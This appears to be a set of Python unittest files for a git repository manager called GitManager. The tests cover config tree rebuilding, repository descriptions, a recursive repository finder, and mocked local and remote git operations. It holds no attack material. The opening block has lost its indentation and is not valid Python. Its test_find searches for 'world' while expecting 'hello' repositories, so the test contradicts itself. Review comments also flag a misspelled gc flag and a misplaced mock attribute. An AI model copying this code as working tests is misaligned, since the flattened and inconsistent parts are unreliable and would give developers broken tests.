def test_find(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that finding repositories works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'something/else/world', ' ', 'world', ' ')
]
# the expected 'hello' repos
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/hello'),
d.RepositoryDescription(source='something/sub/hello',
path='/path/to/home/something/sub/hello')
]
# perform the test
actual = t.find('world')
for (r, a) in zip(results, actual):
self.assertEqual(r, a)
    @unittest.mock.patch('os.path.expanduser',
                         side_effect=lambda s: s.replace("~",
                                                         "/path/to/home/"))
    def test_rebuild(self, os_path_expanduser: unittest.mock.Mock):
        """ Tests that rebuilding a tree normalizes its lines """

        # create a tree instance and setup lines
        t = tree.Tree()
        t.lines = [
            line.NOPLine("# comment"),
            line.BaseLine(' ', 1, ' ', 'base1', ''),
            line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                          'example-repo', ''),
            line.BaseLine(' ', 1, ' ', 'base2', ''),
            line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                          'example-repo', '')
        ]
        t.rebuild()
        # rebuilding drops the NOP (comment) line and keeps everything else
        self.assertEqual(t.lines, [
            line.BaseLine(' ', 1, ' ', 'base1', ''),
            line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                          'example-repo', ''),
            line.BaseLine(' ', 1, ' ', 'base2', ''),
            line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
                          'example-repo', '')
        ])

        # a relative root line is stored as-is
        t = tree.Tree()
        t.lines = [line.RootLine('', '', 'root', '')]
        t.rebuild()
        self.assertEqual(t.lines, [line.RootLine('', '', 'root', '')],
                         'store relative root')

        # a root equal to the (mocked) home directory is removed entirely
        t = tree.Tree()
        t.lines = [line.RootLine('', '', '/path/to/home', '')]
        t.rebuild()
        self.assertEqual(t.lines, [], 'hide root when it is /path/to/home')

        # any other absolute root is kept
        t = tree.Tree()
        t.lines = [line.RootLine('', '', '/opt/root', '')]
        t.rebuild()
        self.assertEqual(t.lines, [line.RootLine('', '', '/opt/root', '')])
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import line
from GitManager.repo import description, implementation
class TestBaseDescription(unittest.TestCase):
    """ Tests that the BaseDescription class works properly """

    def test_eq(self):
        """ Tests that equality works properly """

        # two descriptions built from the same path compare equal
        first = description.BaseDescription('/path/to/local')
        second = description.BaseDescription('/path/to/local')
        self.assertEqual(first, second,
                         'equality between two descriptions')

        # descriptions built from different paths compare unequal
        left = description.BaseDescription('/path/to/local/a')
        right = description.BaseDescription('/path/to/local/b')
        self.assertNotEqual(left, right,
                            'inequality between two descriptions')
class TestRepositoryDescription(unittest.TestCase):
    """ Tests that the RepositoryDescription class works properly """

    def test_eq(self):
        """ Tests that equality works properly """

        # identical (source, path) pairs compare equal
        same_a = description.RepositoryDescription(
            'git@github.com:/example/remote', '/path/to/local')
        same_b = description.RepositoryDescription(
            'git@github.com:/example/remote', '/path/to/local')
        self.assertEqual(same_a, same_b,
                         'equality between two descriptions')

        # a differing source makes the descriptions unequal
        other = description.RepositoryDescription(
            'github.com:/example/remote', '/path/to/local')
        self.assertNotEqual(same_a, other,
                            'inequality between two descriptions')

    def test_local(self):
        """ Tests that local repositories are parsed properly """

        desc = description.RepositoryDescription(
            'git@github.com:/example/remote', '/path/to/local')
        self.assertEqual(desc.local,
                         implementation.LocalRepository('/path/to/local'))

    def test_remote(self):
        """ Tests that the remote repositories are parsed properly """

        desc = description.RepositoryDescription(
            'git@github.com:/example/remote', '/path/to/local')
        self.assertEqual(desc.remote,
                         implementation.RemoteRepository(
                             'git@github.com:/example/remote'))

    def test_to_repo_line(self):
        """ Tests conversion of a description into a (base, repo line) pair """

        # when the final path component equals the final url component it is
        # omitted from the resulting RepoLine
        desc1 = description.RepositoryDescription(
            'git@github.com:/example/remote/repo', '/path/to/local/repo')
        expected1 = (
            description.BaseDescription('/path/to/local'),
            line.RepoLine(
                ' ', 'git@github.com:/example/remote/repo', '', '', ' '
            )
        )
        self.assertEqual(desc1.to_repo_line(' ', ' ', ' '), expected1,
                         'turning a RepositoryDescription into a RepoLine '
                         'omitting final component')

        # otherwise the final path component is stored explicitly
        desc2 = description.RepositoryDescription(
            'git@github.com:/example/remote/repo', '/path/to/local/repo/clone')
        expected2 = (
            description.BaseDescription('/path/to/local/repo'),
            line.RepoLine(
                ' ', 'git@github.com:/example/remote/repo', ' ', 'clone',
                ' '
            )
        )
        self.assertEqual(desc2.to_repo_line(' ', ' ', ' '), expected2,
                         'turning a RepositoryDescription into a RepoLine '
                         'including final component')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.repo import finder, description
class TestFinder(unittest.TestCase):
    """ Tests that the Finder() class works correctly """

    @unittest.mock.patch("os.listdir")
    @unittest.mock.patch("os.path")
    @unittest.mock.patch("GitManager.repo.finder.Finder.get_from_path")
    def test_find_recursive(self,
                            Finder_get_from_path: unittest.mock.Mock,
                            os_path: unittest.mock.Mock,
                            os_listdir: unittest.mock.Mock):
        """ Tests that the find_recursive method works correctly """

        # Setup all the mocks
        # '/link' is a symlink; everything in dirs is a directory
        links = ['/link']
        dirs = ['/link', '/link/a', '/link/b', '/folder', '/folder/a',
                '/folder/b']
        # directory -> entry names returned by the mocked os.listdir
        listings = {
            '/': ['link', 'file.txt', 'folder', 'folder.txt'],
            '/link': ['a', 'a.txt', 'b', 'b.txt'],
            '/link/a': [],
            '/link/b': [],
            '/folder': ['a', 'a.txt', 'b', 'b.txt'],
            '/folder/a': [],
            '/folder/b': [],
        }
        # path -> remote url, for paths that contain a repository
        repos = {
            '/link/a': 'git@example.com:link/a',
            '/link/b': 'git@example.com:link/b',
            '/folder': 'git@example.com:folder',
            '/folder/a': 'git@example.com:folder/a',
            '/folder/b': 'git@example.com:folder/b',
        }

        def join_mock(*args):
            # minimal os.path.join stand-in for absolute POSIX paths
            return '/'.join(args).replace('//', '/')

        os_path.islink.side_effect = lambda l: l in links
        os_path.isdir.side_effect = lambda d: d in dirs
        os_listdir.side_effect = lambda d: listings[d]
        os_path.join.side_effect = join_mock

        def frompath_mock(path):
            # mimic Finder.get_from_path: raise for non-repository paths
            if path in repos:
                return description.RepositoryDescription(repos[path], path)
            else:
                raise ValueError()

        Finder_get_from_path.side_effect = frompath_mock

        # finding repositories not allowing links and not allowing
        # sub-repositories
        self.assertEqual(list(finder.Finder.
                              find_recursive('/', allow_links=False,
                                             continue_in_repository=False)),
                         [
                             description.RepositoryDescription(
                                 'git@example.com:folder',
                                 '/folder'
                             )
                         ])

        # finding repositories allowing links but not more
        self.assertEqual(list(finder.Finder.
                              find_recursive('/', allow_links=True,
                                             continue_in_repository=False)),
                         [
                             description.RepositoryDescription(
                                 'git@example.com:link/a',
                                 '/link/a'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:link/b',
                                 '/link/b'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder',
                                 '/folder'
                             )
                         ])

        # finding repositories allowing repos in repos, but not more
        self.assertEqual(list(finder.Finder.
                              find_recursive('/', allow_links=False,
                                             continue_in_repository=True)),
                         [
                             description.RepositoryDescription(
                                 'git@example.com:folder',
                                 '/folder'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder/a',
                                 '/folder/a'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder/b',
                                 '/folder/b'
                             )
                         ])

        # finding repositories allow repos in repos and links
        self.assertEqual(list(finder.Finder.
                              find_recursive('/', allow_links=True,
                                             continue_in_repository=True)),
                         [
                             description.RepositoryDescription(
                                 'git@example.com:link/a',
                                 '/link/a'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:link/b',
                                 '/link/b'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder',
                                 '/folder'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder/a',
                                 '/folder/a'
                             ),
                             description.RepositoryDescription(
                                 'git@example.com:folder/b',
                                 '/folder/b'
                             )
                         ])

    @unittest.mock.patch("GitManager.repo.implementation.LocalRepository")
    def test_get_from_path(self,
                           implementation_LocalRepository: unittest.mock.Mock):
        """ Tests that the get_from_path function works properly """

        # if there is no local repository, we should throw a value error
        implementation_LocalRepository.return_value.exists.return_value = False
        with self.assertRaises(ValueError):
            finder.Finder.get_from_path('/path/to/repository')
        implementation_LocalRepository.assert_called_with(
            '/path/to/repository')

        # reset the mocks
        implementation_LocalRepository.reset_mock()

        # local repository exists, and the remote url is returned directly
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.get_remote_url \
            .return_value = 'git@example.com:example/repo'

        # check that a repository with an origin is found properly
        self.assertEqual(
            finder.Finder.get_from_path('/path/to/repository'),
            description.RepositoryDescription(
                'git@example.com:example/repo',
                '/path/to/repository'
            )
        )
        implementation_LocalRepository.assert_called_with(
            '/path/to/repository')
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_called_with('origin')

        # reset the mocks
        implementation_LocalRepository.reset_mock()

        def mock_raise(arg):
            raise ValueError()

        # raises an error if no url is returned
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remotes = []
        implementation_LocalRepository.return_value.get_remote_url \
            .side_effect = mock_raise

        # check that a repository without any remotes raises
        with self.assertRaises(ValueError):
            finder.Finder.get_from_path('/path/to/repository')
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_called_with('origin')

        # reset the mocks
        implementation_LocalRepository.reset_mock()

        # raises an error if no url is returned
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remotes = ['upstream']
        implementation_LocalRepository.return_value.get_remote_url \
            .side_effect = mock_raise

        # check that both 'origin' and the listed remote were attempted
        with self.assertRaises(ValueError):
            finder.Finder.get_from_path('/path/to/repository')
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_any_call('origin')
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_any_call('upstream')

        # reset the mocks
        implementation_LocalRepository.reset_mock()

        def mock_originerror(name):
            # 'origin' fails, any other remote resolves
            if name == 'origin':
                raise ValueError()
            else:
                return 'git@example.com:example/repo'

        # falls back to other remotes when 'origin' has no url
        implementation_LocalRepository.return_value.exists.return_value = True
        implementation_LocalRepository.return_value.remotes = ['upstream']
        implementation_LocalRepository.return_value.get_remote_url \
            .side_effect = mock_originerror

        # check that a repository with an upstream is found properly
        self.assertEqual(
            finder.Finder.get_from_path('/path/to/repository'),
            description.RepositoryDescription(
                'git@example.com:example/repo',
                '/path/to/repository'
            )
        )
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_any_call('origin')
        implementation_LocalRepository.return_value.get_remote_url \
            .assert_any_call('upstream')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.repo import implementation
class TestLocalRepository(unittest.TestCase):
    """ Tests that the LocalRepository class works properly, mocking out all
    external git invocations via GitManager.utils.run.GitRun """

    def test_eq(self):
        """ Checks that equality between LocalRepositories works properly """

        self.assertEqual(
            implementation.LocalRepository('/path/to/clone'),
            implementation.LocalRepository('/path/to/clone'),
            'equality between two LocalRepositories'
        )

        self.assertNotEqual(
            implementation.LocalRepository('/home/user/example'),
            implementation.LocalRepository(
                '/home/user/example/.git'),
            'difference between two LocalRepositories')

    def test_path(self):
        """ Tests that the path property works as intended """

        self.assertEqual(
            implementation.LocalRepository('/path/to/clone').path,
            '/path/to/clone',
            'path of a simple repository'
        )

        self.assertEqual(
            implementation.LocalRepository(
                '/home/user/example').path,
            '/home/user/example',
            'path of a simple git repository'
        )

    def test_str(self):
        """ Tests that the str() of a remoteRepository works properly """

        self.assertEqual(
            str(implementation.LocalRepository(
                '/path/to/clone')),
            '/path/to/clone',
            'str() of a simple repository'
        )

        self.assertEqual(
            str(implementation.LocalRepository(
                '/home/user/example')),
            '/home/user/example',
            'str() of a simple git repository'
        )

    def test_repr(self):
        """ Tests that the repr() of a remoteRepository works properly """

        self.assertEqual(
            repr(implementation.LocalRepository(
                '/path/to/clone')),
            '<LocalRepository /path/to/clone>',
            'str() of a simple repository'
        )

        self.assertEqual(
            repr(implementation.LocalRepository(
                '/home/user/example')),
            '<LocalRepository /home/user/example>',
            'repr() of a simple git repository'
        )

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_remotes(self, run_gitrun: unittest.mock.Mock):
        """ checks that remotes properly works as intended """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # set the return value: 'git remote show -n' output, one name per line
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="origin\nupstream".encode("utf-8"))()

        self.assertEqual(repo.remotes, ["origin", "upstream"], "Remotes are "
                                                               "parsed "
                                                               "properly")

        run_gitrun.assert_called_with('remote', 'show', '-n',
                                      cwd='/path/to/repository')
        run_gitrun.return_value.wait.assert_called_with()

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_get_remote_url(self, run_gitrun: unittest.mock.Mock):
        """ checks that get_remote_url function works as intended """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # throw an error for the remote
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="fatal: No such remote 'example'\n".encode("utf-8"))()
        run_gitrun.return_value.success = False

        # check that an error is thrown if we look for a remote that doesn't
        # exist
        with self.assertRaises(ValueError):
            repo.get_remote_url("example")
        run_gitrun.assert_called_with('remote', 'get-url', 'example',
                                      cwd='/path/to/repository')

        # thrown no error
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="git@example.com:example/repo\n".encode("utf-8"))()
        run_gitrun.return_value.success = True

        # check that we can actually get the remote url
        self.assertEqual(repo.get_remote_url('origin'),
                         'git@example.com:example/repo', 'getting a remote '
                                                         'url')

        # check that the git run has been called
        run_gitrun.assert_called_with('remote', 'get-url', 'origin',
                                      cwd='/path/to/repository')

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    @unittest.mock.patch('os.path.isdir')
    def test_exists(self, os_path_isdir: unittest.mock.Mock,
                    run_gitrun: unittest.mock.Mock):
        """ checks that exists method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # setup mocks so that the path does not exist
        os_path_isdir.return_value = False

        self.assertFalse(repo.exists(), 'non-existence of a repository')
        os_path_isdir.assert_called_with('/path/to/repository')
        # no git call is made when the directory is missing
        run_gitrun.assert_not_called()

        # setup mocks so that the path exists but the --show-toplevel fails
        os_path_isdir.reset_mock()
        os_path_isdir.return_value = True
        run_gitrun.reset_mock()
        run_gitrun.return_value.success = False
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="/path/to\n".encode("utf-8"))()

        self.assertFalse(repo.exists(),
                         'non-existence of a repository when toplevel fails')
        os_path_isdir.assert_called_with('/path/to/repository')
        run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
                                      cwd='/path/to/repository')

        # toplevel succeeds but points at a parent directory -> not a repo
        run_gitrun.reset_mock()
        run_gitrun.return_value.success = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="/path/to\n".encode("utf-8"))()

        self.assertFalse(repo.exists(),
                         'non-existence of a repository when not toplevel')
        os_path_isdir.assert_called_with('/path/to/repository')
        run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
                                      cwd='/path/to/repository')

        # setup mocks so that the path exists and is toplevel
        os_path_isdir.reset_mock()
        os_path_isdir.return_value = True
        run_gitrun.reset_mock()
        run_gitrun.return_value.success = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="/path/to/repository\n".encode("utf-8"))()

        self.assertTrue(repo.exists(),
                        'existence of a repository when not toplevel')
        os_path_isdir.assert_called_with('/path/to/repository')
        run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
                                      cwd='/path/to/repository')

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_ref_parse(self, run_gitrun: unittest.mock.Mock):
        """ checks that ref_parse function works as intended """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # set the return value
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="aaaaaa\n".encode("utf-8"))()

        self.assertEqual(repo.ref_parse("master"), "aaaaaa", "parsing master "
                                                             "works properly")

        run_gitrun.assert_called_with("rev-parse", "master",
                                      cwd='/path/to/repository')
        run_gitrun.return_value.wait.assert_called_with()

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_symbolic_ref(self, run_gitrun: unittest.mock.Mock):
        """ checks that symbolic_ref properly works as intended """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # set the return value
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="refs/heads/master\n".encode("utf-8"))()

        self.assertEqual(repo.symbolic_ref("HEAD"), "refs/heads/master",
                         "parsing symbolic ref works properly")

        run_gitrun.assert_called_with("symbolic-ref", "-q", "HEAD",
                                      cwd='/path/to/repository')
        run_gitrun.return_value.wait.assert_called_with()

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_upstream_ref(self, run_gitrun: unittest.mock.Mock):
        """ checks that upstream_ref properly works as intended """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # set the return value
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="origin/master\n".encode("utf-8"))()

        self.assertEqual(repo.upstream_ref("refs/heads/master"),
                         "origin/master",
                         "parsing upstream ref works properly")

        run_gitrun.assert_called_with("for-each-ref",
                                      "--format=%(upstream:short)",
                                      "refs/heads/master",
                                      cwd='/path/to/repository')
        run_gitrun.return_value.wait.assert_called_with()

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_gc(self, run_gitrun: unittest.mock.Mock):
        """ checks that gc method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # and make sure that the return value is True
        # NOTE(review): this sets .success on the GitRun class mock rather
        # than on run_gitrun.return_value as other tests in this class do;
        # the assertTrue below passes either way because an unset MagicMock
        # attribute is truthy -- confirm which attribute repo.gc() reads.
        run_gitrun.success = True

        # assert that we can garbage collect
        self.assertTrue(repo.gc(),
                        'running garbage collection on a repository')

        # check that we called the fetch --all command properly
        run_gitrun.assert_called_with('gc', cwd='/path/to/repository',
                                      pipe_stderr=True, pipe_stdin=True,
                                      pipe_stdout=True)

        # reset the mock
        run_gitrun.reset_mock()
        run_gitrun.success = True

        # NOTE(review): '--aggresive' is misspelled ('--aggressive'), but the
        # call and the assertion below use the same string, so this test is
        # self-consistent.
        self.assertTrue(repo.gc('--aggresive'),
                        'running aggressive housekeeping on a repository')

        # check that we called the fetch --all command properly
        run_gitrun.assert_called_with('gc', '--aggresive',
                                      cwd='/path/to/repository',
                                      pipe_stderr=True, pipe_stdin=True,
                                      pipe_stdout=True)

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_fetch(self, run_gitrun: unittest.mock.Mock):
        """ checks that fetch method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # and make sure that the return value is True
        run_gitrun.success = True

        # assert that we can fetch
        self.assertTrue(repo.fetch(), 'fetching a repository')

        # check that we called the fetch --all command properly
        run_gitrun.assert_called_with('fetch', '--all', '--quiet',
                                      cwd='/path/to/repository',
                                      pipe_stderr=True, pipe_stdin=True,
                                      pipe_stdout=True)

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_pull(self, run_gitrun: unittest.mock.Mock):
        """ checks that pull method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # and make sure that the return value is True
        run_gitrun.success = True

        # assert that we can pull
        self.assertTrue(repo.pull(), 'pulling a repository')

        # check that we called the pull command properly
        run_gitrun.assert_called_with('pull', cwd='/path/to/repository',
                                      pipe_stderr=True, pipe_stdin=True,
                                      pipe_stdout=True)

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_push(self, run_gitrun: unittest.mock.Mock):
        """ checks that push method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # and make sure that the return value is True
        run_gitrun.success = True

        # assert that we can push
        self.assertTrue(repo.push(), 'push a repository')

        # check that we called the push command properly
        run_gitrun.assert_called_with('push', cwd='/path/to/repository',
                                      pipe_stderr=True, pipe_stdin=True,
                                      pipe_stdout=True)

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_local_status(self, run_gitrun: unittest.mock.Mock):
        """ checks that local_status method makes an external call """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # mock the exists function
        repo.exists = unittest.mock.MagicMock(return_value=False)

        # local status and non-existence
        self.assertEqual(repo.local_status(), None, "local_status of "
                                                    "non-existing "
                                                    "repository")

        # reset the mock and change the return value to True
        repo.exists.reset_mock()
        repo.exists.return_value = True

        # setup the return value of the git run: empty porcelain output
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="".encode("utf-8"))()

        # check that the local_status did print correctly
        self.assertEqual(repo.local_status(), "", "Reading status works "
                                                  "properly")

        # check that we called the status command
        run_gitrun.assert_called_with('status', '--porcelain',
                                      cwd='/path/to/repository')

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository.ref_parse',
        side_effect=["aaaaaa", "bbbbbb", "aaaaaa", "bbbbbb", "aaaaaa",
                     "bbbbbb", "aaaaaa", "bbbbbb", "aaaaaa", "bbbbbb"]
    )
    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository.upstream_ref',
        side_effect=["origin/master", "origin/master", "origin/master",
                     "origin/master", "origin/master"]
    )
    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository.symbolic_ref',
        side_effect=["refs/heads/master", "refs/heads/master",
                     "refs/heads/master", "refs/heads/master",
                     "refs/heads/master"]
    )
    @unittest.mock.patch(
        'GitManager.repo.implementation.LocalRepository.exists'
    )
    def test_remote_status(self,
                           LocalRepository_exists: unittest.mock.Mock,
                           LocalRepository_symbolic_ref: unittest.mock.Mock,
                           LocalRepository_upstream_ref: unittest.mock.Mock,
                           LocalRepository_ref_parse: unittest.mock.Mock,
                           run_gitrun: unittest.mock.Mock):
        """ Tests that the remote_status command works properly.

        The patched ref_parse alternates between the local hash 'aaaaaa' and
        the remote hash 'bbbbbb' on consecutive calls. """

        # create a repository
        repo = implementation.LocalRepository('/path/to/repository')

        # if we want to update, we should have called with 'remote' 'update'
        run_gitrun.return_value.success = False
        self.assertEqual(repo.remote_status(update=True), None)
        run_gitrun.assert_called_with('remote', 'update',
                                      cwd='/path/to/repository')

        # reset all the mocks
        LocalRepository_exists.reset_mock()
        LocalRepository_symbolic_ref.reset_mock()
        LocalRepository_upstream_ref.reset_mock()
        LocalRepository_ref_parse.reset_mock()
        run_gitrun.reset_mock()
        run_gitrun.return_value.success = True

        # repository does not exist -> no remote status
        LocalRepository_exists.return_value = False
        self.assertEqual(repo.remote_status(), None)

        # reset all the mocks
        LocalRepository_exists.reset_mock()
        LocalRepository_symbolic_ref.reset_mock()
        LocalRepository_upstream_ref.reset_mock()
        LocalRepository_ref_parse.reset_mock()
        run_gitrun.reset_mock()

        # merge base equals the local ref -> the remote is newer
        LocalRepository_exists.return_value = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="aaaaaa\n".encode("utf-8"))()
        self.assertEqual(repo.remote_status(update=False),
                         implementation.RemoteStatus.REMOTE_NEWER)
        run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
                                      cwd="/path/to/repository")

        # reset all the mocks
        LocalRepository_exists.reset_mock()
        LocalRepository_symbolic_ref.reset_mock()
        LocalRepository_upstream_ref.reset_mock()
        LocalRepository_ref_parse.reset_mock()
        run_gitrun.reset_mock()

        # merge base equals the remote ref -> the local side is newer
        LocalRepository_exists.return_value = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="bbbbbb\n".encode("utf-8"))()
        self.assertEqual(repo.remote_status(),
                         implementation.RemoteStatus.LOCAL_NEWER)
        run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
                                      cwd="/path/to/repository")

        # reset all the mocks
        LocalRepository_exists.reset_mock()
        LocalRepository_symbolic_ref.reset_mock()
        LocalRepository_upstream_ref.reset_mock()
        LocalRepository_ref_parse.reset_mock()
        run_gitrun.reset_mock()

        # merge base is neither ref -> the branches have diverged
        LocalRepository_exists.return_value = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="cccccc\n".encode("utf-8"))()
        self.assertEqual(repo.remote_status(update=False),
                         implementation.RemoteStatus.DIVERGENCE)
        run_gitrun.assert_called_with("merge-base", "aaaaaa", "bbbbbb",
                                      cwd="/path/to/repository")

        # reset all the mocks
        LocalRepository_exists.reset_mock()
        LocalRepository_symbolic_ref.reset_mock()
        LocalRepository_upstream_ref.reset_mock()
        LocalRepository_ref_parse.reset_mock()
        run_gitrun.reset_mock()

        # both refs are equal
        LocalRepository_ref_parse.side_effect = ["aaaaaa", "aaaaaa"]
        LocalRepository_exists.return_value = True
        run_gitrun.return_value.stdout = unittest.mock.mock_open(
            read_data="aaaaaa\n".encode("utf-8"))()
        self.assertEqual(repo.remote_status(update=False),
                         implementation.RemoteStatus.UP_TO_DATE)
        run_gitrun.assert_called_with("merge-base", "aaaaaa", "aaaaaa",
                                      cwd="/path/to/repository")
class TestRemoteRepository(unittest.TestCase):
    """ Tests that implementation.RemoteRepository works properly """

    def test_eq(self):
        """ Checks that equality between RemoteRepositories works properly """
        # two instances built from the same URL compare equal
        self.assertEqual(
            implementation.RemoteRepository('git@github.com:hello/world.git'),
            implementation.RemoteRepository('git@github.com:hello/world.git'),
            'equality between two RemoteRepositories'
        )
        # different URL strings compare unequal, even when they point to
        # the same logical repository over different protocols
        self.assertNotEqual(
            implementation.RemoteRepository('git@github.com:hello/world.git'),
            implementation.RemoteRepository(
                'https://github.com/hello/world.git'),
            'difference between two RemoteRepositories'
        )

    def test_url(self):
        """ Tests that the URL property works as intended """
        # the url property returns the construction URL unchanged
        self.assertEqual(
            implementation.RemoteRepository(
                'git@github.com:hello/world.git').url,
            'git@github.com:hello/world.git',
            'URL of a simple repository'
        )
        self.assertEqual(
            implementation.RemoteRepository(
                'https://github.com/hello/world.git').url,
            'https://github.com/hello/world.git',
            'URL of a simple git repository'
        )

    def test_matches(self):
        """ Tests that the matches() of a RemoteRepository works properly """
        repo = implementation.RemoteRepository(
            'git@github.com:hello/world.git')
        # positive cases: names, paths, glob patterns, substrings, full url
        self.assertTrue(repo.matches('world'), 'matching by a simple name')
        self.assertTrue(repo.matches('hello/world'), 'matching by path')
        self.assertTrue(repo.matches('w*'), 'matching by simple pattern')
        self.assertTrue(repo.matches('h*/w*'), 'matching by complex pattern')
        self.assertTrue(repo.matches('github.com/hello'),
                        'matching at the beginning')
        self.assertTrue(repo.matches('hello'), 'matching in the middle')
        self.assertTrue(repo.matches('git@github.com:hello/world.git'),
                        'matching full url')
        # negative cases: near-miss names and patterns must not match
        self.assertFalse(repo.matches('wirld'), 'not matching non-pattern')
        self.assertFalse(repo.matches('hello/wirld'),
                         'not matching non-pattern')
        self.assertFalse(repo.matches('*/wirld'), 'not matching non-pattern')
        self.assertFalse(repo.matches('git@github.com:halo/world.git'),
                         'not matching full url')

    def test_str(self):
        """ Tests that the str() of a RemoteRepository works properly """
        # str() returns the bare URL
        self.assertEqual(
            str(implementation.RemoteRepository(
                'git@github.com:hello/world.git')),
            'git@github.com:hello/world.git',
            'str() of a simple repository'
        )
        self.assertEqual(
            str(implementation.RemoteRepository(
                'https://github.com/hello/world.git')),
            'https://github.com/hello/world.git',
            'str() of a simple git repository'
        )

    def test_repr(self):
        """ Tests that the repr() of a RemoteRepository works properly """
        # repr() wraps the URL in '<RemoteRepository ...>'
        self.assertEqual(
            repr(implementation.RemoteRepository(
                'git@github.com:hello/world.git')),
            '<RemoteRepository git@github.com:hello/world.git>',
            'repr() of a simple repository'
        )
        self.assertEqual(
            repr(implementation.RemoteRepository(
                'https://github.com/hello/world.git')),
            '<RemoteRepository https://github.com/hello/world.git>',
            'repr() of a simple git repository'
        )

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_exists(self, run_gitrun: unittest.mock.Mock):
        """ checks that exists() delegates to 'git ls-remote' """
        run_gitrun.return_value.success = True
        # checking for existence should make an external call
        self.assertTrue(implementation.RemoteRepository(
            'git@github.com:hello/world.git').exists(),
            'successfully checks existence using an external call')
        run_gitrun.assert_called_with('ls-remote', '--exit-code',
                                      'git@github.com:hello/world.git')

    @unittest.mock.patch('GitManager.utils.run.GitRun')
    def test_clone(self, run_gitrun: unittest.mock.Mock):
        """ checks that clone() delegates to 'git clone' """
        run_gitrun.return_value.success = True
        remote = implementation.RemoteRepository(
            'git@github.com:hello/world.git')
        local = implementation.LocalRepository('/path/to/clone')
        # cloning should make an external call with all streams attached
        self.assertTrue(remote.clone(local), 'successfully clones a '
                                             'repository')
        run_gitrun.assert_called_with('clone',
                                      'git@github.com:hello/world.git',
                                      '/path/to/clone', pipe_stderr=True,
                                      pipe_stdin=True, pipe_stdout=True)

    def test_components(self):
        """ Checks that the components() method works properly """

        def assert_components(url, components):
            # helper: components() of url must equal the expected list
            return self.assertEqual(
                implementation.RemoteRepository(url).components(), components)

        # git@github.com url -- with and without .git / trailing slashes
        g_h_w_c = ['github.com', 'hello', 'world']
        assert_components('git@github.com:hello/world.git', g_h_w_c)
        assert_components('git@github.com:hello/world', g_h_w_c)
